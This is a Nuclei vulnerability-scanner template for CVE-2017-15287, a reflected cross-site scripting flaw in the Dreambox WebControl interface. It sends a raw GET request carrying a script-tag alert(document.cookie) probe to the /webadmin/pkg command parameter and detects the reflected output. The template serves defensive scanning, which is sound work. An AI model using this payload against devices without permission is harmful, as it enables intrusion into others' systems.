nuclei-templates/cves/2017/CVE-2017-15287.yaml

29 lines
931 B
YAML

id: CVE-2017-15287
info:
name: Dreambox WebControl Reflected XSS
author: pikpikcu
severity: medium
description: There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
reference:
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-15287
cwe-id: CWE-79
tags: cve,cve2017,xss,dreambox
requests:
- raw:
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
- 'Unknown command: <script>alert(document.cookie)</script>'